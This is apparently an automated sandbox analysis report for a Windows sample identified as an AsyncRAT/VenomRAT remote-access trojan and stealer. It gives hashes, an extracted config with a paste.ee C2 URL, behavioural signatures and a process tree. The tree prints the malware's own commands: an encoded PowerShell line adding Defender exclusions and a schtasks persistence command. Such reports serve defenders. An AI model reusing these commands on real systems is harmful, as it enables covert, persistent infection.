Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 17:51
Static task
static1
Behavioral task
behavioral1
Sample
1337.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
1337.exe
Resource
win10v2004-20250217-en
General
-
Target
1337.exe
-
Size
24.3MB
-
MD5
124d9ebd081fe16de958304349b59316
-
SHA1
e2770e0cd44041e9ce91e77da2c7f56d04654ef3
-
SHA256
50a1656f6cca2b5a9810f6a70352cf56d5ab156e80752a68f49e968460a634b1
-
SHA512
49fcf668108b7b472bdec5261125c14e3e24251eb6b906b3bca4bf87a6333e7c1e6aec62c40a11ab975c5e4d3c750ca55cf5ef093a8f5ce7aaa70b477ab9ea9e
-
SSDEEP
393216:QvKOA+h/KlqTs0jCaQBdzqLx0HQkGN3zFlfje6f4gXBNobFF6V44uS4SbO:Qi5+h/Kl3MVy9GxGGNjbP4g3oMV4E41
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
INC
lwosqqqkziedfsbxxgh
-
c2_url_file
https://paste.ee/r/SvRLFmbW/0
-
delay
1
-
install
true
-
install_file
System.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
resource yara_rule behavioral2/files/0x000b000000023c4f-25.dat VenomRAT behavioral2/memory/3192-35-0x0000000000CE0000-0x0000000000CF8000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000b000000023c4f-25.dat family_asyncrat -
Downloads MZ/PE file 1 IoCs
flow pid Process 28 1528 MinuteRise.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation 1337.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation bodrumblock.exe -
Executes dropped EXE 4 IoCs
pid Process 1528 MinuteRise.exe 3192 bodrumblock.exe 5020 System.exe 3168 VanCat.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 raw.githubusercontent.com 28 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 api.ipify.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1528 MinuteRise.exe 1528 MinuteRise.exe 3168 VanCat.exe 3168 VanCat.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\VanCat.exe MinuteRise.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2484 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4768 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4784 powershell.exe 4784 powershell.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 3192 bodrumblock.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 5020 System.exe 5020 System.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 3168 VanCat.exe 3168 VanCat.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 3168 VanCat.exe 3168 VanCat.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe 1528 MinuteRise.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 3192 bodrumblock.exe Token: SeDebugPrivilege 5020 System.exe Token: SeIncreaseQuotaPrivilege 2336 WMIC.exe Token: SeSecurityPrivilege 2336 WMIC.exe Token: SeTakeOwnershipPrivilege 2336 WMIC.exe Token: SeLoadDriverPrivilege 2336 WMIC.exe Token: SeSystemProfilePrivilege 2336 WMIC.exe Token: SeSystemtimePrivilege 2336 WMIC.exe Token: SeProfSingleProcessPrivilege 2336 WMIC.exe Token: SeIncBasePriorityPrivilege 2336 WMIC.exe Token: SeCreatePagefilePrivilege 2336 WMIC.exe Token: SeBackupPrivilege 2336 WMIC.exe Token: SeRestorePrivilege 2336 WMIC.exe Token: SeShutdownPrivilege 2336 WMIC.exe Token: SeDebugPrivilege 2336 WMIC.exe Token: SeSystemEnvironmentPrivilege 2336 WMIC.exe Token: SeRemoteShutdownPrivilege 2336 WMIC.exe Token: SeUndockPrivilege 2336 WMIC.exe Token: SeManageVolumePrivilege 2336 WMIC.exe Token: 33 2336 WMIC.exe Token: 34 2336 WMIC.exe Token: 35 2336 WMIC.exe Token: 36 2336 WMIC.exe Token: SeIncreaseQuotaPrivilege 2336 WMIC.exe Token: SeSecurityPrivilege 2336 WMIC.exe Token: SeTakeOwnershipPrivilege 2336 WMIC.exe Token: SeLoadDriverPrivilege 2336 WMIC.exe Token: SeSystemProfilePrivilege 2336 WMIC.exe Token: SeSystemtimePrivilege 2336 WMIC.exe Token: SeProfSingleProcessPrivilege 2336 WMIC.exe Token: SeIncBasePriorityPrivilege 2336 WMIC.exe Token: SeCreatePagefilePrivilege 2336 WMIC.exe Token: SeBackupPrivilege 2336 WMIC.exe Token: SeRestorePrivilege 2336 WMIC.exe Token: SeShutdownPrivilege 2336 WMIC.exe Token: SeDebugPrivilege 2336 WMIC.exe Token: SeSystemEnvironmentPrivilege 2336 WMIC.exe Token: SeRemoteShutdownPrivilege 2336 WMIC.exe Token: SeUndockPrivilege 2336 WMIC.exe Token: SeManageVolumePrivilege 2336 WMIC.exe Token: 33 2336 WMIC.exe Token: 34 2336 WMIC.exe Token: 35 2336 WMIC.exe Token: 36 2336 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5020 System.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1736 wrote to memory of 4784 1736 1337.exe 86 PID 1736 wrote to memory of 4784 1736 1337.exe 86 PID 1736 wrote to memory of 1528 1736 1337.exe 88 PID 1736 wrote to memory of 1528 1736 1337.exe 88 PID 1736 wrote to memory of 3192 1736 1337.exe 90 PID 1736 wrote to memory of 3192 1736 1337.exe 90 PID 3192 wrote to memory of 1984 3192 bodrumblock.exe 91 PID 3192 wrote to memory of 1984 3192 bodrumblock.exe 91 PID 3192 wrote to memory of 1596 3192 bodrumblock.exe 92 PID 3192 wrote to memory of 1596 3192 bodrumblock.exe 92 PID 1596 wrote to memory of 2484 1596 cmd.exe 96 PID 1596 wrote to memory of 2484 1596 cmd.exe 96 PID 1984 wrote to memory of 4768 1984 cmd.exe 95 PID 1984 wrote to memory of 4768 1984 cmd.exe 95 PID 1596 wrote to memory of 5020 1596 cmd.exe 102 PID 1596 wrote to memory of 5020 1596 cmd.exe 102 PID 1528 wrote to memory of 3168 1528 MinuteRise.exe 104 PID 1528 wrote to memory of 3168 1528 MinuteRise.exe 104 PID 1528 wrote to memory of 3140 1528 MinuteRise.exe 107 PID 1528 wrote to memory of 3140 1528 MinuteRise.exe 107 PID 1528 wrote to memory of 4400 1528 MinuteRise.exe 108 PID 1528 wrote to memory of 4400 1528 MinuteRise.exe 108 PID 1528 wrote to memory of 1056 1528 MinuteRise.exe 110 PID 1528 wrote to memory of 1056 1528 MinuteRise.exe 110 PID 1056 wrote to memory of 4212 1056 cmd.exe 111 PID 1056 wrote to memory of 4212 1056 cmd.exe 111 PID 1056 wrote to memory of 232 1056 cmd.exe 112 PID 1056 wrote to memory of 232 1056 cmd.exe 112 PID 1056 wrote to memory of 4084 1056 cmd.exe 113 PID 1056 wrote to memory of 4084 1056 cmd.exe 113 PID 3168 wrote to memory of 2512 3168 VanCat.exe 114 PID 3168 wrote to memory of 2512 3168 VanCat.exe 114 PID 2512 wrote to memory of 2336 2512 cmd.exe 115 PID 2512 wrote to memory of 2336 2512 cmd.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1337.exe"C:\Users\Admin\AppData\Local\Temp\1337.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbAB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAZABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdgBhACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Users\Admin\AppData\Roaming\MinuteRise.exe"C:\Users\Admin\AppData\Roaming\MinuteRise.exe"2⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Program Files\VanCat.exe"C:\Program Files\VanCat.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic CPU get ProcessorId4⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\Wbem\WMIC.exewmic CPU get ProcessorId5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0F3⤵PID:3140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\MinuteRise.exe" MD5 | find /i /v "md5" | find /i /v "certutil"3⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Roaming\MinuteRise.exe" MD54⤵PID:4212
-
-
C:\Windows\system32\find.exefind /i /v "md5"4⤵PID:232
-
-
C:\Windows\system32\find.exefind /i /v "certutil"4⤵PID:4084
-
-
-
-
C:\Users\Admin\AppData\Roaming\bodrumblock.exe"C:\Users\Admin\AppData\Roaming\bodrumblock.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:4768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCCA6.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:2484
-
-
C:\Users\Admin\AppData\Roaming\System.exe"C:\Users\Admin\AppData\Roaming\System.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5020
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23.8MB
MD5a0b04a462f047852099c2fd10aa1032e
SHA12521136f9f4090f7bf5502a1a1e09019f5f18687
SHA256efa95e1479ced3a397afee667954fa2018bff56b12f5f5115cad04c542247bb4
SHA5121d745b77db3be428be53410a85a5a127588ad0c55164080def0cb27b3c38da348bbd6c21acb3482820e452524306cf2e3d00cfb9d10929c00bf7e9fb1fb7dd60
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
150B
MD53a0c9b7bdcafafd1f8440a7a7bda4f17
SHA198818f3e5a98eb8779da0892a22ef99c36f5ad79
SHA2563875c3a7be4bd9378093233b9d58adccadd0cae24515cc637371b940c9c81d7f
SHA5122b0506ed5b6ccab3331c8ba0bbec7fac86700039fd3229dd8cf2da7c88e6ae2ceef032cb357efbd62fd331391295f7090800a9b0732e07500e3db99b972de9a5
-
Filesize
24.2MB
MD5ecae486dc6bd0a98d2ddcafb1f31234b
SHA19946585e084aa83595224ffdbb6309652688e83c
SHA256b374f8110f763d82d7c9c810fb56143b368cdc653015fa8476371dafff5f5cc5
SHA5124b5cd0f97d087dc4c28633ba02fa2d70d003773de98bbe9a58a2b4e62a14b99231f31ab51a59e7030d7f39857538303fafa6fc8953810c3837ffe02c51c8e407
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
Filesize
74KB
MD5e830512d5396d46e4096ee5e77000346
SHA15166598d44af9a175df751f8b05fa03ac75eb564
SHA2563a801e25820e80e07bc406d3e2a4758c27e8914fff70163923b802531d59a894
SHA512c145ed988a0eae611f848cb546fce5a10d8e75afb020c58c0381142b9a76c7d54f1d38652a4838886567397a8d60e35789cef707a86d6c1d19da0c6337150e9e
-
Filesize
25B
MD50df8a94468f33ea8384ca17dac9ea3bd
SHA140d1c1e280cba51d7391b0a1d8e453c340fef739
SHA2567488c3a61581b0d47c426005ce0f390e26b8367afd46deb8fe9be4b7c3781a83
SHA5122bef715c372206273f492e8df5f076f8088f75182dadb1118616f8c60e0474af6205a786fdac16297fd7ec716a87203ff5f38377bd094b05721536364d64fbdd